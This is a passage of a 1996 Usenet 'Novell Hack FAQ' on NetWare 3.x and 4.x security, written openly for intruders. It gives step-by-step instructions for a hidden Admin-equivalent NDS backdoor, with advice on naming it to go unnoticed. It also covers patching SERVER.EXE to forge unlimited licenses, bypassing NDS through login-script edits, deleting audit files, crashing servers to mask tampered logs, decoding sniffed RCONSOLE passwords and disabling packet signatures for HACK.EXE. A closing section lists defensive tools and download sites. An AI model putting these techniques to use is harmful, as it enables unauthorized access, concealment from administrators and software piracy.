  1483. NNTP-Posting-Host: fw47.fastlane.net
  1484. X-Newsreader: WinVN 0.92.6+
  1485.  
  1486. ---------------------------------------------------------------------------
  1487.  
  1488. Section 06
  1489.  
  1490. Fun with Netware 4.1
  1491.  
  1492. ---------------------------------------------------------------------------
  1493.  
  1494. 06-1. What is interesting about Netware 4.x's licensing?
  1495.  
  1496. It is possible to load multiple licenses and combine their total number of
  1497. users. For example, if you are in one of those Novell CNE classes where they 
  1498. give you a 2 user 4.1 license, you can get everyone's CD in class and combine 
  1499. them on one server. If you get 10 CDs you have a 20 user license. I know of no 
  1500. limit to the maximum number of licenses and user limit, except for hardware 
  1501. limitations supporting it. This means you could load more than one copy of
  1502. 1000 user Netware 4.1 on a server (assuming you have unique copies, not the
  1503. same copy twice).
  1504.  
  1505. itsme has done some poking around with his tools, and has the following to say
  1506. regarding the SERVER.EXE that comes with Netware 4: 
  1507.  
  1508.  what's inside server.exe:
  1509.  0001d7c7  server.nlm          type=07
  1510.  000d319d  "Link" 000d504a
  1511.  000d31a5  unicode.nlm         type=00  (ordinary NLM)
  1512.  000d504a  "Link" 000d6e9c
  1513.  000d5052  dsloader.nlm        type=00  (ordinary NLM)
  1514.  000d6e9c  "Link" 000db808
  1515.  000d6ea4  timesync.nlm        type=00  (ordinary NLM)
  1516.  000db808  polimgr.nlm         type=0c  ('hidden' NLM)
  1517.    by editing the binary of server, and changing the type of polimgr.nlm
  1518.    from 0c to 00  (offset 007a or 000db882 in server.exe)
  1519.    it becomes unhidden.
  1520.    hidden NLM's are protected from debugging with the netware debugger.
  1521.  
  1522.    polimgr.nlm  manages the license files, after it reads the file,
  1523.    it checks with somekind of signature function whether it is a valid file
  1524.    the function doing the checking can be made to always return OK, then
  1525.    you can create an any number of users license.
  1526.  
  1527. ---------------------------------------------------------------------------
  1528.  
  1529. 06-2. How can I tell if something is being Audited?
  1530.  
  1531. Use RCONSOLE and do a directory scan of SYS:_NETWARE. There will be some
  1532. binary files named NET$AUDT.* if Auditing has been used. Old Audit files will
  1533. be named NET$AUDT.AO0, .AO1, etc. A current Auditing file will be named
  1534. NET$AUDT.CAF. If these files do not exist, no Auditing is being or has been
  1535. done. To check to see if Auditing is currently active, try to open the
  1536. current Auditing file like this:
  1537.  
  1538.       LOAD EDIT SYS:_NETWARE\NET$AUDT.CAF
  1539.  
  1540. If it pulls up something (with a little garbage) then Auditing is currently 
  1541. turned off. If you get an error stating that NET$AUDT.CAF doesn't exist and
  1542. do you wish to create it, that means the file is being hend open and 
  1543. Auditing is currently active on SOMETHING (remember, the EDIT.NLM normally
  1544. handles open files pretty well, but trying to open a file already open in
  1545. SYS:_NETWARE always gets this error).
  1546.  
  1547. ---------------------------------------------------------------------------
  1548.  
  1549. 06-3. Where are the Login Scripts stored and can I edit them?
  1550.  
  1551. The Login Scripts are stored in, you guessed it, SYS:_NETWARE. Unlike the
  1552. binary files used in NDS, these files are completely editable by using 
  1553. EDIT.NLM. Doing an RCONSOLE directory scan in SYS:_NETWARE will turn up
  1554. files with extensions like .000, these are probably Login Scripts. Pull up
  1555. a few, they are plain text files. For example, you found 00021440.000:
  1556.  
  1557.       LOAD EDIT SYS:_NETWARE\00021440.000
  1558.  
  1559. If it is a Login Script, you will see it in plain english and you can 
  1560. certainly edit and save it. This completely bypasses NDS security, and is the
  1561. main weakness. You can use this to grant a user extra rights that can lead to
  1562. a number of compromises, including full access to the file system of any
  1563. server in the tree.
  1564.  
  1565. ---------------------------------------------------------------------------
  1566.  
  1567. 06-4. What is the rumored "backdoor" in NDS?
  1568.  
  1569. The rumored backdoor in NDS exists - to an extent. The rumor is that there
  1570. is a way to set up a backdoor into a system in NDS that is completely
  1571. hidden from everyone and everything. There IS a way to get real close to
  1572. this, although how "hidden" it is remains to be seen. One catch - you need
  1573. full access to NDS i.e. Admin access to set it up. But if you can get Admin's
  1574. password or access to a user with Admin or equivalent access then you can
  1575. put in a backdoor that may go unnoticed for months, or perhaps never be
  1576. discovered. Here's how to set it up:
  1577.  
  1578.       - Get logged in as Admin or equivalent.
  1579.       - In NWADMIN highlight an existing container.
  1580.       - Create a new container inside this container.
  1581.       - Create a user inside this new container. No home directory.
  1582.       - Give this user full Trustee Rights to their own user object.
  1583.       - Give this user full Trustee Rights to the new container.
  1584.       - Make this user security equivalent to Admin.
  1585.       - Modify the ACL for the new user so they can't be seen.
  1586.       - Adjust the Inherit Rights Filter on the new container so no one can
  1587.         see it.
  1588.  
  1589. Now this technique can be used by the paranoid admin that wants to give 
  1590. another user full access to a container, and this user wants to restrict
  1591. access to this container. To prevent this user from forgetting their
  1592. password (and making a section of the tree unmanageable or worse, disappear)
  1593. an admin will use similiar techniques.
  1594.  
  1595. I have not been able to fully test this but it looks completely invisible to 
  1596. the average LAN admin. This does require an above average knowledge of NDS to
  1597. set up, so most administrators will not even know how to look for this user.
  1598.  
  1599. Let's say you installed your backdoor at the XYZ Company, put your container 
  1600. inside the MIS container and called it BADBOY. Your backdoor is named 
  1601. BACKDOOR. Login like this:
  1602.  
  1603.       LOGIN .BACKDOOR.BADBOY.MIS.XYZ
  1604.  
  1605. Now you will show up in the normal tools that show active connections on a
  1606. server, so naming your backdoor "BACKDOOR" is probably not a great idea.
  1607. Think of a name that might look like an automated attachment, and only use it
  1608. when you think you won't be noticed.
  1609.  
  1610. If the site has Kane Security Analyst, they can find the backdoor.
  1611.  
  1612. ---------------------------------------------------------------------------
  1613.  
  1614. 06-5. How can I remove NDS?
  1615.  
  1616. This one is dangerous. This one will get you your Admin account back if you
  1617. lost the password, and is not for the light-hearted if you plan on actually
  1618. using NDS afterwards. Do this at a 4.1 console:
  1619.  
  1620. LOAD INSTALL -DSREMOVE
  1621.  
  1622. Now in the INSTALL module, go ahead and try to remove NDS. As a part of the
  1623. process, it will ask you for the Admin password, get this, JUST MAKE ONE UP.
  1624. If you get errors, no problem. Keep going and you can remove NDS from the
  1625. server. Even though you gave it the wrong password, it will still let you
  1626. remove NDS. I told you this one is real wicked...
  1627.  
  1628. ---------------------------------------------------------------------------
  1629.  
  1630. 06-6. How can I remove Auditing if I lost the Audit password?
  1631.  
  1632. If the Auditor forgets the password, try a simple wipe and reload. Hello,
  1633. hello, you seemed to have fainted... 
  1634.  
  1635. You can try this although there is no guarantee it will work, it is just a 
  1636. theory. You see, the Auditing files are located in SYS:_NETWARE. As long as
  1637. they are there and Auditing active, even deleting NDS and recreating it will
  1638. not turn off Auditing. If you wish you can delete and rebuild SYS: which 
  1639. will get it. Try these listed items if you are desperate. I have tried them
  1640. in the Nomad Mobile Reseach Centre lab and got this to work a couple of times 
  1641. -- but once I trashed the server and NDS. One time it didn't work at all. But 
  1642. here it is:
  1643.  
  1644.       - Use RCONSOLE's directory scan and get the exact names of the Audit
  1645.         files, you know NET$AUDT.CAF but also files with an extension of .$AF
  1646.         are Auditing files, too.
  1647.       - Use the techniques in 06-2 and determine exactly which files are
  1648.         being held open by this particular server for Auditing.
  1649.       - Try booting up the server and running a sector editor.
  1650.       - Search the drive for the file names you found.
  1651.       - Change all occurrences of these names, save changes, and boot up.
  1652.       - If that didn't do the trick, try booting up the server using a 3.x
  1653.         SERVER.EXE and try and get to SYS:_NETWARE that way. Then delete the 
  1654.         Auditing files.
  1655.       - If THAT doesn't work, use repeated calls to the SYS:_NETWARE's
  1656.         directory table (using the APIs) and either delete or change the
  1657.         afore mentioned files.
  1658.  
  1659. Gee, maybe a "simple wipe and reload" is easier...
  1660.  
  1661. ---------------------------------------------------------------------------
  1662.  
  1663. 06-7. Does 4.x store the LOGIN password to a temporary file?
  1664.  
  1665. Yes and no. No to 4.02 or higher. Here's the scoop on 4.0.
  1666.  
  1667. The version of LOGIN.EXE that shipped with 4.0 had a flaw that under the 
  1668. right conditions the account and password could be written to a swap file 
  1669. created by LOGIN.EXE. Once this occured, the file could be unerased and the
  1670. account and password retrieved in plain text.
  1671.  
  1672. ---------------------------------------------------------------------------
  1673.  
  1674. 06-8. Everyone can make themselves equivalent to anyone including Admin. How?
  1675.  
  1676. A couple of things might cause this. One, I'd check the rights for [PUBLIC], 
  1677. and secondly I'd check the USER_TEMPLATE id for excessive rights. The Write 
  1678. right to the ACL will allow you to do some interesting things, including
  1679. making yourself Admin equivalent. For gaining equivalence to most anything
  1680. else you need only Read and Compare.
  1681.  
  1682. The implication should be obvious, but I'll spell it out anyway. A backdoor
  1683. can be made if an account is set up this way. Let's say you've created an 
  1684. account called TEST that has enough rights to do this kind of thing. Simply 
  1685. go in as the TEST account, make yourself Admin equivalent, do your thing, 
  1686. remove the Admin equivalent, and get the hell out. Neat and sweet.
  1687.  
  1688. ---------------------------------------------------------------------------
  1689.  
  1690. 06-9. Can I reset an NDS password with just limited rights?
  1691.  
  1692. There is a freeware utility called N4PASS, that is meant for Netware 4.10 
  1693. (uses NDS calls and is not bindery based). The intention of this package is
  1694. to enable a Help Desk to reset passwords for users without granting them
  1695. tons of rights. It uses full logging and does not require massive ACL
  1696. manipulation to do it.
  1697.  
  1698. Obviously being set up to use this utility opens a few doors. The filename
  1699. is N4PA11.EXE on Netwire in Compuserve, and should be on one of Novell's
  1700. mirror sites soon.
  1701.  
  1702. You can reach the author at dcollins@fastlane.net
  1703.  
  1704. A couple of interesting things about this utility -- if configured
  1705. incorrectly the server may be compromised in a number of ways. For instance,
  1706. the password generated is stored in a temp file. If the directory for
  1707. N4PASS is not set to purge immediately, the file is salvagable. Also, if
  1708. the rights to the N4PASS directory are too open, you can discover the default
  1709. password, among other things. The text file included with the utility
  1710. covers this, so read it carefully if you are installing it. If you are
  1711. hacking, read it carefully too ;-)
  1712.  
  1713. ---------------------------------------------------------------------------
  1714.  
  1715. 06-10. What is OS2NT.NLM?
  1716.  
  1717. OS2NT.NLM is a Novell-supplied NLM for recovering/fixing Admin, like after 
  1718. it becomes an Unknown object, as opposed to User -- especially after a
  1719. DSREPAIR. This module is considered a "last resort" NLM and you must contact 
  1720. Novell to use it. While I haven't seen it, it is supposed to be on one of
  1721. Novell's FTP sites. It supposedly is customized by Novell to work with
  1722. your serial number and is a one-time use NLM. You have to prove to Novell
  1723. who you are and that your copy of Netware is registered.
  1724.  
  1725. I would suspected it is possible that this NLM could be hacked to get
  1726. around the one-time use and serial number/password thing, but a restore
  1727. of NDS from a good backup would accomplish things better. This way is a 
  1728. little destructive.
  1729.  
  1730. ---------------------------------------------------------------------------
  1731.  
  1732. 06-11. Do you have to be Admin equivalent to reset a password?
  1733.  
  1734. No. There is a freeware utility called N4PASS, that is meant for Netware 
  1735. 4.10 (uses NDS calls and is not bindery based).
  1736.  
  1737. The intent is for helpdesk staff to reset passwords for users without
  1738. setting up elaborate ACL settings for a group to control the password 
  1739. property. It supposedly does this with full logging. I'm looking for info on 
  1740. it, so let me know if you have tips on its use.
  1741.  
  1742. ---------------------------------------------------------------------------
  1743.  
  1744.  
  1745. - Simple Nomad - Data Wanderer, Knowledge Hunter/Gatherer
  1746. -    E-Mail    - thegnome@fastlane.net - thegnome@spyder.org
  1747. -              - thegnome@onyx.infonexus.com
  1748. -      URL     - http://www.fastlane.net/homepages/thegnome
  1749. -    Secrets   - Get "new" PGP key via my home page
  1750.  
  1751. From netcom.com!ix.netcom.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news Fri Mar  8 08:39:29 1996
  1752. Xref: netcom.com alt.2600:178184 comp.os.netware.security:3208 comp.security.misc:27784
  1753. Path: netcom.com!ix.netcom.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news
  1754. From: thegnome@fastlane.net (Simple Nomad)
  1755. Newsgroups: alt.2600,comp.os.netware.security,comp.security.misc
  1756. Subject: Novell Hack FAQ -- Part 9 of 12
  1757. Date: 8 Mar 1996 04:49:29 GMT
  1758. Organization: Nomad Mobile Research Centre
  1759. Lines: 337
  1760. Message-ID: <4hoe8p$ih0@news2.nkn.net>
  1761. NNTP-Posting-Host: fw47.fastlane.net
  1762. X-Newsreader: WinVN 0.92.6+
  1763.  
  1764. ---------------------------------------------------------------------------
  1765.  
  1766. Section 07
  1767.  
  1768. Miscellaneous Info on Netware
  1769.  
  1770. ---------------------------------------------------------------------------
  1771.  
  1772. 07-1. Why can't I get through the 3.x server to another network via TCP/IP?
  1773.  
  1774. Loading the TCPIP.NLM in a server with two cards does not mean that packets
  1775. will be forwarded from one card to another. For packet forwarding to work, the
  1776. AUTOEXEC.NCF file should have the line:
  1777.  
  1778. load tcpip forward=yes
  1779.  
  1780. For packets to go through the server, you must set up a "gateway=aa.bb.cc.dd" 
  1781. option on the workstation. This leaves routing up to the server. If you are 
  1782. writing hack tools, keep this in mind if they use IP. Some older routers may
  1783. not recognize the Netware server as a router, so you may not have many options
  1784. if your target is on the other side of one of these routers. Newer routers are
  1785. Netware aware and will "find" your server as a router through RIP.
  1786.  
  1787. Netware 3.11 IP will only forward between two different subnets. Proxy Arp is 
  1788. currently not supported in Netware IP. Example:
  1789.  
  1790. 123.45.6 & 123.45.7 with a mask of ff.ff.ff.00 will forward packets
  1791.  
  1792. 123.45.6 & 231.45.7 with a mask of ff.ff.ff.00 will not
  1793.  
  1794. This way you do not waste precious time trying to cross an uncrossable river.
  1795. Some admins use this to limit the flow of IP traffic.
  1796.  
  1797. ---------------------------------------------------------------------------
  1798.  
  1799. 07-2. How can I boot my server without running STARTUP.NCF/AUTOEXEC.NCF?
  1800.  
  1801. For Netware 3.xx, use these command-line options:
  1802.  
  1803. SERVER -NS to skip STARTUP.NCF, and
  1804.  
  1805. SERVER -NA to skip AUTOEXEC.NCF
  1806.  
  1807. NetWare 2.x does not HAVE the files STARTUP.NCF and AUTOEXEC.NCF. Instead they
  1808. hard-code all the information into NET$OS.EXE, so you will have to rebuild it
  1809. to change anything.
  1810.  
  1811. ---------------------------------------------------------------------------
  1812.  
  1813. 07-3. How can I login without running the System Login Script?
  1814.  
  1815. Often an admin will try and prevent a user from getting to DOS or breaking
  1816. out of the System Login Script to "control" the user. Here's to way to
  1817. prevent that -
  1818.  
  1819.  - Use ATTACH instead of LOGIN to connect to a server. ATTACH will not run
  1820. the login script, whereas LOGIN will. ATTACH.EXE will either have to be
  1821. copied to a local HD or put in SYS:LOGIN.
  1822.  - Use the /s <fname> option for LOGIN. Using "LOGIN /S NUL <login>" will
  1823. cause LOGIN to load the DOS device NUL which will always seem like an empty
  1824. file.
  1825.  
  1826. ---------------------------------------------------------------------------
  1827.  
  1828. 07-4. How do I remotely reboot a Netware 3.x file server?
  1829.  
  1830. If you have access to a server via RCONSOLE it may come in handy after
  1831. loading or unloading an NLM to reboot a server. Build an NCF file by
  1832. doing the following steps -
  1833.  
  1834.  - Create a file called DOWNBOY.NCF on your local drive. It should be
  1835. a text file and contain the following lines:
  1836.  
  1837.     REMOVE DOS
  1838.     DOWN
  1839.     EXIT
  1840.  
  1841.  - Copy up the file to the SYS:SYSTEM directory using RCONSOLE.
  1842.  
  1843.  - At the System Console prompt, type DOWNBOY and enter.
  1844.  
  1845. What happens is this - the REMOVE DOS statement frees up the DOS section
  1846. in server RAM, the server is downed (if there are open files, you will
  1847. be given one of those "are you sure" messages, answer Y for yes), and
  1848. the EXIT command tries to return the server console to DOS. But since
  1849. you removed DOS from RAM, the server is warm booted.
  1850.  
  1851. ---------------------------------------------------------------------------
  1852.  
  1853. 07-5. How can I abend a Netware server? And why?
  1854.  
  1855. I'll answer the second question first. You may be testing your server as an
  1856. administrator and wish to see how you are recovering from crashes. Or you
  1857. may be a hacker and wish to cover your tracks VERY DRAMATICALLY. After all,
  1858. if you are editing log files and they are going to look funny when you are
  1859. done, a good crash might explain why things look so odd in the logs.
  1860.  
  1861. These are per itsme:
  1862.  
  1863. - Netware 4.1 : type 512 chars on the console + NENTER -> abend
  1864. - Netware 3.11 : NCP request 0x17-subfn 0xeb with a connection number higher
  1865.   than the maximum allowed will crash the server (yes you will need the APIs)
  1866.  
  1867. ---------------------------------------------------------------------------
  1868.  
  1869. 07-6. What is Netware NFS and is it secure?
  1870.  
  1871. NFS (Networked File System) is used primarily in Unix to remotely mount a
  1872. different file system. Its primary purpose in Netware is to allow the
  1873. server to mount a Unix file system as a Netware volume, allowing Netware
  1874. users access to Unix data without running IP or logging into the server,
  1875. and Unix users to mount a Netware volume as a remote file system. If the 
  1876. rights are set up incorrectly you can gain access to a server. 
  1877.  
  1878. While the product works as described, it is a little hard to administer,
  1879. as user accounts on both sides must be in sync (name and password) and it
  1880. can be a fairly manual process to ensure that they are.
  1881.  
  1882. A reported problem with Netware NFS is that after unloading and reloading 
  1883. using the .NCF files, a system mount from the Unix side includes SYS:ETC
  1884. read only access. If this directory can be looked at from the Unix side 
  1885. after a mount, .NCF and .CFG files could be viewed and their information
  1886. exploited. For example, SYS:ETC is a possible location of LDREMOTE.NCF,
  1887. which could include the RCONSOLE password.
  1888.  
  1889. Netware NFS' existence on a server says you have some Unix boxes around
  1890. somewhere, which may be of interest as another potential system to gain
  1891. access to.
  1892.  
  1893. ---------------------------------------------------------------------------
  1894.  
  1895. 07-7. Can sniffing packets help me break in?
  1896.  
  1897. Yes. If a user is logging in and the password is being transmitted to the server 
  1898. unencrypted, it will show up as plain text in the trace. If the site uses telnet 
  1899. and ftp, capturing those password will come in handy. Outside of gaining access 
  1900. to another system, many users will make their passwords the same across all 
  1901. systems.
  1902.  
  1903. For a list of DOS-based sniffers, see the alt.2600/#hack FAQ. I personally
  1904. prefer the Network General Sniffer ;-)
  1905.  
  1906. RCONSOLE.EXE is the client-launched application that provides a remote
  1907. server console to a Novell Netware file server. The connection between client
  1908. and server allows administrators to manage servers as if they were at the
  1909. physical server console from their desks, and allow virtually any action
  1910. that would be performed at the server console to be performed remotely,
  1911. including execution of console commands, uploading of files to the server,
  1912. and the unloading and loading of Netware Loadable Modules (NLMs). It is not
  1913. only an effective tool for administrators, it is a prime target for hackers.
  1914.  
  1915. A critical point of access to many servers is the actual physical console.
  1916. This is one of the main reasons why physical security of the server is so
  1917. important and stressed by security conscious administrators. On many systems
  1918. you have a level of access with little to no security. Netware is no 
  1919. exception.
  1920.  
  1921. The main reason to hack RCONSOLE is to gain access to the Netware server
  1922. console. No, you aren't physically there, but the OS doesn't know any 
  1923. different. And the main reason to gain access to the Netware server console
  1924. is to utilize a tool to gain Supervisor access to the Netware server.
  1925.  
  1926. During the RCONSOLE process, the password does come across the wire encrypted.
  1927. If you look at the conversation you will see packets containing the 
  1928. RCONSOLE.EXE being opened, the possible servers to be accessed, etc. This 
  1929. conversation is nothing but NCP packets.
  1930.  
  1931. Once RCONSOLE is up on the workstation, the user chooses the server, hits enter,
  1932. and is prompted for a password. After entering the password, the conversation 
  1933. contains two 60 byte IPX/SPX packets going back and forth followed by 4 NCP
  1934. packets, 64 bytes, 60 bytes, 64 bytes, and 310 bytes in length respectively. 
  1935. The next IPX/SPX packet, 186 bytes in length, contains the password. It is 
  1936. located at offset 3Ah, which is easy to find. Offset 38h is always FE and offset 
  1937. 39h is always FF. 
  1938.  
  1939. Now comes the use of a tool called RCON.EXE from itsme that can take some of
  1940. the information you have collected and turn it into the password. What you
  1941. need are the first 8 hex bytes starting at offset 3Ah, the network address,
  1942. and the node address. Now the network and node address are in the header of
  1943. the packet that contains the encrypted password, but can also get these by
  1944. typing USERLIST /A which returns this info (and more) for each person
  1945. logged in.
  1946.  
  1947. Now why just the first 8 hex bytes? That's all Novell uses. Great
  1948. encryption scheme, huh?
  1949.  
  1950. ---------------------------------------------------------------------------
  1951.  
  1952. 07-8. What else can sniffing get me?
  1953.  
  1954. Jeff Carr has pointed out that RCONSOLE sends screens in plaintext across
  1955. the network for all to see (well, all with sniffers). This means you can
  1956. see what is being typed in and what is happening on the screen. While it is 
  1957. not the prettiest stuff to look at, occassional gems are available. Jeff's
  1958. best gem? The RCONSOLE password. The server had been brought up without
  1959. REMOTE and RSPX being loaded, they were loaded by hand at the console after
  1960. the server was brought up. The first RCONSOLE session brought up the screen
  1961. with the lines LOAD REMOTE and LOAD RSPX PASSWORD (with PASSWORD being the
  1962. RCONSOLE password), and this was being sent to the RCONSOLE user's 
  1963. workstation in plaintext.
  1964.  
  1965. Teiwaz discovered that SYSCON sends password changes in plaintext. While
  1966. SETPASS, LOGIN, MAP, and ATTACH all encrypt the password in 3.x, SYSCON
  1967. does not.
  1968.  
  1969. ---------------------------------------------------------------------------
  1970.  
  1971. 07-9. How does password encryption work?
  1972.  
  1973. From itsme -
  1974.  
  1975. the password encryption works as follows:
  1976.  1- the workstation requests a session key from the server
  1977.      (NCP-17-17)
  1978.  2- the server sends a unique 8 byte key to the workstation
  1979.  
  1980.  3- the workstation encrypts the password with the userid,
  1981.      - this 16 byte value is what is stored in the bindery on the server
  1982.  
  1983.  4- the WS then encrypts this 16 byte value with the 8 byte session key
  1984.     resulting in 8 bytes, which it sends to the server
  1985.      (NCP-17-18 = login), (NCP-17-4a = verify pw) (NCP-17-4b = change pw)
  1986.  
  1987.  5- the server performs the same encryption, and compares its own result
  1988.     with that sent by the WS
  1989.  
  1990. -> the information contained in the net$*.old files which can be found
  1991.    in the system directory after bindfix was run, is enough to login
  1992.    to the server as any object. just skip step 3
  1993.  
  1994. ---------------------------------------------------------------------------
  1995.  
  1996. 07-10. Are there products to help improve Netware's security?
  1997.  
  1998. While there are a number of products, commercial and shareware/public domain
  1999. that have some security-related features, the following products are either
  2000. really good or have some unique features.
  2001.  
  2002. There is a commercial product called SmartPass, which runs as an NLM. Once
  2003. installed, you can load this and analyze existing passwords for weaknesses.
  2004. A limited-time free demo can be obtained from the following address:
  2005.  
  2006.     http://www.egsoftware.com/
  2007.  
  2008. SmartPass will check passwords on the fly, so a user can be forced to use a
  2009. non-dictionary word for a password.
  2010.  
  2011. Another commercial product product that will check from a dictionary word
  2012. list and simply report if the password is on the list is Bindview NCS. There
  2013. is a brand new NDS version of this product but I haven't look at it yet.
  2014. The bindery version is god-awful slow, but completely accurate. It requires
  2015. Supe access to run. Bindview can also produce a number of reports. including
  2016. customized reports to give you all kinds of info on the server and its
  2017. contents. For more info on Bindview:
  2018.  
  2019.     http://www.bindview.com/
  2020.  
  2021. For doing Auditing on a 3.x version of Netware, try AuditTrack. It will track
  2022. all access to a directory or individual file by user, which can come in handy
  2023. for seeing who is doing what. Out of the box Netware 3.11 has virtually no
  2024. way to track what an individual user is doing, but the AuditTrack NLM helps
  2025. greatly. E.G. Software, the developer, can be reached at:
  2026.  
  2027.     http://www.egsoftware.com/
  2028.  
  2029. Intrusion Detection Systems puts out a commercial product called Kane
  2030. Security Analyst. It is considered by many to the "SATAN" of Netware. One
  2031. of its abilities is locating hidden objects in the NDS tree. For a good
  2032. demo, a 30 day trial version, and more info:
  2033.  
  2034.     http://www.intrusion.com/
  2035.  
  2036. ---------------------------------------------------------------------------
  2037.  
  2038. 07-11. What is Packet Signature and how do I get around it?
  2039.  
  2040. Packet signatures works by using an intermediate step during the encrypted
  2041. password login call, to calculate a 64-bit signature.  This block is never
  2042. transmitted over the wire, but it is used as the basis for a
  2043. cryptographically strong signature ("secure hash") on the most important
  2044. part of each NCP packet exchange.
  2045.  
  2046. A signed packet can indeed be taken as proof sufficient that the packet came
  2047. from the claimed PC.
  2048.  
  2049. NCP Packet Signature is Novell's answer to the work of the folks in the
  2050. Netherlands in hacking Netware. The idea behind it is to prevent forged
  2051. packets and unauthorized Supervisor access. It is an add-on option in 3.11,
  2052. but a part of the system with 3.12 and 4.x. Here are the signature levels
  2053. at the client and server:
  2054.  
  2055. Packet Signature Option and meaning:
  2056. 0 = Don't do packet signatures
  2057. 1 = Do packet signatures if required
  2058. 2 = Do packet signatures if you can but don't if the other end doesn't support
  2059. them
  2060. 3 = Require packet signatures
  2061.  
  2062. You can set the same settings at the workstation server. The default for packet
  2063. signatures is 2 at the server and client. If you wish to use a tool like
  2064. HACK.EXE, try setting the signature level at 0 on the client by adding
  2065. Signature Level=0 in the client's NET.CFG. If packet signatures are required
  2066. at the server you won't even get logged in, but if you get logged in, hack away.
  2067.  
  2068. If you wish to change the signature level at the server, use a set command at
  2069. the server console:
  2070.  
  2071. SET NCP PACKET SIGNATURE OPTION=2
  2072.  
  2073. ---------------------------------------------------------------------------
  2074.  
  2075. 07-12. Do any Netware utilities have holes like Unix utilities?
  2076.  
  2077. This is a fairly common question, inspired by stack overrun errors,
  2078. sendmail bugs, and the like that exist in the Unix world. The reason you do
  2079. not have these kind of exploits in common Netware utilities is because:
  2080.  
  2081. - You use a proprietary shell that can be loaded without accessing the
  2082. server, therefore no shell exploits exist.
  2083. - Virtually all Netware utilities do NOT use stdin and stdout, so no stack
  2084. overruns that exploit anything.
  2085. - Since the shell is run locally, not on the server, you have no way to
  2086. use a utility to gain greater access than you have been granted, like a
  2087. SUID script in Unix.
  2088. - Yes there are utilities like HACK.EXE that grant extra access under
  2089. certain conditions in 3.11, but no Novell-produced utility comes close to
  2090. granting extra access.
  2091.  
  2092. ---------------------------------------------------------------------------
  2093.  
  2094.  
  2095.  
  2096. - Simple Nomad - Data Wanderer, Knowledge Hunter/Gatherer
  2097. -    E-Mail    - thegnome@fastlane.net - thegnome@spyder.org
  2098. -              - thegnome@onyx.infonexus.com
  2099. -      URL     - http://www.fastlane.net/homepages/thegnome
  2100. -    Secrets   - Get "new" PGP key via my home page
  2101.  
  2102. From netcom.com!ix.netcom.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news Fri Mar  8 08:39:29 1996
  2103. Xref: netcom.com alt.2600:178185 comp.os.netware.security:3209 comp.security.misc:27785
  2104. Path: netcom.com!ix.netcom.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news
  2105. From: thegnome@fastlane.net (Simple Nomad)
  2106. Newsgroups: alt.2600,comp.os.netware.security,comp.security.misc
  2107. Subject: Novell Hack FAQ -- Part 10 of 12
  2108. Date: 8 Mar 1996 04:51:00 GMT
  2109. Organization: Nomad Mobile Research Centre
  2110. Lines: 252
  2111. Message-ID: <4hoebk$ih0@news2.nkn.net>
  2112. NNTP-Posting-Host: fw47.fastlane.net
  2113. X-Newsreader: WinVN 0.92.6+
  2114.  
  2115. ---------------------------------------------------------------------------
  2116.  
  2117. Section 08
  2118.  
  2119. Resources
  2120.  
  2121. ---------------------------------------------------------------------------
  2122.  
  2123. 08-1. What are some Netware FTP locations?
  2124.  
  2125. These are from various FAQs. I have not checked all of these and I'm pretty
  2126. sure some may no longer be up. But here's a starting point.
  2127.  
  2128. Novell's ftp site:
  2129.  
  2130. ftp.novell.com                                  137.65.3.11
  2131. ftp.novell.de                                   193.97.1.1
  2132.  
  2133. Novell's ftp Mirrors:
  2134.  
  2135. netlab2.usu.edu                                 129.123.1.44 (the best)
  2136. bnug.proteon.com                                128.103.85.201
  2137. ftp.rug.nl              /networks/novell        129.125.4.15
  2138. ftp.salford.ac.uk       /novell                 146.87.255.21
  2139. tui.lincoln.ac.nz       /novell/novlib          138.75.90.4
  2140. novell.nrc.ca           /netwire                132.246.160.4
  2141.  
  2142. Other Misc. Sites:
  2143.  
  2144. ml0.ucs.ed.ac.uk        /guest/pc               129.215.112.49 (second best)
  2145. splicer2.cba.hawaii.edu /files/novell           128.171.17.2
  2146.             /files/pegasus
  2147. cc.usu.edu              /slip                   129.123.1.1
  2148.             /tcp-ip
  2149. risc.ua.edu             /pub/network/novlib     130.160.4.7
  2150.             /pub/network/pegasus
  2151.             /pub/network/misc
  2152.             /pub/network/tcpip
  2153. wuarchive.wustl.edu     /etc/system/novell      128.252.135.4
  2154. nctuccca.edu.tw                                 192.83.166.10
  2155. ftp.uni-kl.de           /pub/novell             131.246.94.94
  2156. dorm.rutgers.edu        /pub/novell             128.6.21.20
  2157. netlab.usu.edu          /novell                 129.123.1.11
  2158.             /netwatch
  2159. chaos.cc.ncsu.edu       /pc/novell              152.1.10.23
  2160.             /pc/utils
  2161.             /pc/email
  2162.             /pc/net
  2163.             /pc/manage
  2164. dutiws.twi.tudelft.nl   /pub/novell             130.161.156.11
  2165. jumper.mcc.ac.uk        /pub/security/netware   130.88.202.26
  2166. sodapop.cc.LaTech.edu   /pub/novell/specials    138.47.22.47
  2167. ftp.safe.net            /pub/safetynet/         199.171.27.2
  2168. ftp.best.com            /pub/almcepud/hacks     206.86.8.2
  2169. ftp.efs.mq.edu.au       /pub/novell             137.111.55.8
  2170. nic.switch.ch           /mirror/novell          139.50.1.40
  2171. onyx.infonexus.com      /pub/ToolsOfTheTrade/Netware
  2172.                                                 204.162.164.220
  2173. biomed.engr.LaTech.edu  /sys/pub/ecl/specials   138.47.15.1
  2174.  
  2175. ---------------------------------------------------------------------------
  2176.  
  2177. 08-2. Can I get files without FTP?
  2178.  
  2179. Try using the BITFTP-FTP/Email gateway. Just send e-mail containing HELP as
  2180. the BODY (not a subject) to BITFTP@PUCC.BITNET. It will send more info to
  2181. you.
  2182.  
  2183. Internet gateways are:
  2184.  
  2185. ftpmail@decwrl.dec.com
  2186.  
  2187. ftpmail@cs.uow.edu.au
  2188.  
  2189. If you are on Compuserve, type GO NETWIRE to get to Novell's forum. There are
  2190. files on there for downloading. Also try the CD NSEpro, which is most of the
  2191. Netwire forum put on CD.
  2192.  
  2193. ---------------------------------------------------------------------------
  2194.  
  2195. 08-3. What are some Netware WWW locations?
  2196.  
  2197. http://www.novell.com/                                  Novell in Provo
  2198. http://www.novell.de/                                   Novell in Europe
  2199. http://www.salford.ac.uk/ais/Network/Novell-Faq.html    Novell@listserv.syr.edu
  2200. http://mft.ucs.ed.ac.uk/                                Edinburg Tech Library*
  2201. http://resudox.net/bio/mainpage.html                    Great tools**
